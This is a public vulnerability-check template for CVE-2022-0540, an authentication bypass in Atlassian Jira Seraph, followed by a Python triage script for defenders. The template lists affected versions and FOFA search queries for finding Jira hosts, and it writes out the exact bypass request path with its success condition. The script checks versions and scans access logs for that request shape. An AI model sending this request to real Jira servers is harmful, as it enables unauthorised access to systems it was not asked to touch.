A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to
bypass authentication by sending a specially crafted HTTP
request. This affects Atlassian Jira Server and Data Center versions before 8.13.18,
versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0.
This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18,
versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
fofa "Atlassian Jira"
fofa title="General"
PoC code [public]
id: CVE-2022-0540
info:
  name: Atlassian Jira - Authentication bypass in Seraph
  author: DhiyaneshDK 不动明王
  severity: critical
  verified: true
  description: |-
    A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to
    bypass authentication by sending a specially crafted HTTP
    request. This affects Atlassian Jira Server and Data Center versions before 8.13.18,
    versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0.
    This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18,
    versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
    fofa "Atlassian Jira"
    fofa title="General"
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  tags: cve,cve2022,jira,unauthorized,bypass
  created: 2023/06/23
rules:
  r0:
    request:
      method: GET
      path: /InsightPluginShowGeneralConfiguration.jspa;
    expression: response.status == 200 && response.body.bcontains(b'General Insight Configuration')
expression: r0()
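
For defenders, a triage helper that checks an installed version against the affected ranges listed above and scans access logs for requests that carry a path parameter directly after `.jspa`, the shape of the path the template requests. This is an added example, not part of the template or of any Atlassian tooling; the function names, the `jsm` product key, the combined log format and the sample log lines are assumptions made for illustration.

```python
import re

# Affected ranges from the advisory text: (first affected, first fixed) per product.
# "jsm" is a label chosen here for Jira Service Management.
AFFECTED = {
    "jira": [((0, 0, 0), (8, 13, 18)), ((8, 14, 0), (8, 20, 6)), ((8, 21, 0), (8, 22, 0))],
    "jsm": [((0, 0, 0), (4, 13, 18)), ((4, 14, 0), (4, 20, 6)), ((4, 21, 0), (4, 22, 0))],
}
# Request line and status of a combined-format access log entry (assumed log format).
LOG_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A path parameter (';...') directly after '.jspa'.
PATH_PARAM_RE = re.compile(r"\.jspa;(?P<param>[^/]*)", re.IGNORECASE)


def is_affected(version, product="jira"):
    """True when 'X.Y.Z' (or 'X.Y') lies in a range the advisory lists as affected."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    v = tuple(int(p or 0) for p in m.groups())
    return any(low <= v < fixed for low, fixed in AFFECTED[product])


def suspicious_requests(lines):
    """Return (path, status, path_param) for requests with ';' right after '.jspa'."""
    hits = []
    for line in lines:
        entry = LOG_RE.search(line)
        if not entry:
            continue
        path = entry["path"].split("?", 1)[0]  # a ';' in the query string is not a path parameter
        param = PATH_PARAM_RE.search(path)
        if param:
            # ';jsessionid=...' from servlet URL rewriting is a common benign source;
            # it is reported with its value so an analyst can triage it, not dropped.
            hits.append((path, int(entry["status"]), param["param"]))
    return hits


# Constructed sample log lines (documentation IP range), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jun/2023:10:00:01 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Jun/2023:10:00:02 +0000] "GET /secure/Dashboard.jspa;jsessionid=ABC123 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [23/Jun/2023:10:00:03 +0000] "GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1" 200 8192',
    '192.0.2.77 - - [23/Jun/2023:10:00:04 +0000] "GET /secure/Dashboard.jspa?x=.jspa; HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(is_affected("8.20.5"), suspicious_requests(SAMPLE_LOG))
```

A hit with status 200 and an empty path parameter on a host where `is_affected` returns true is the combination to investigate first.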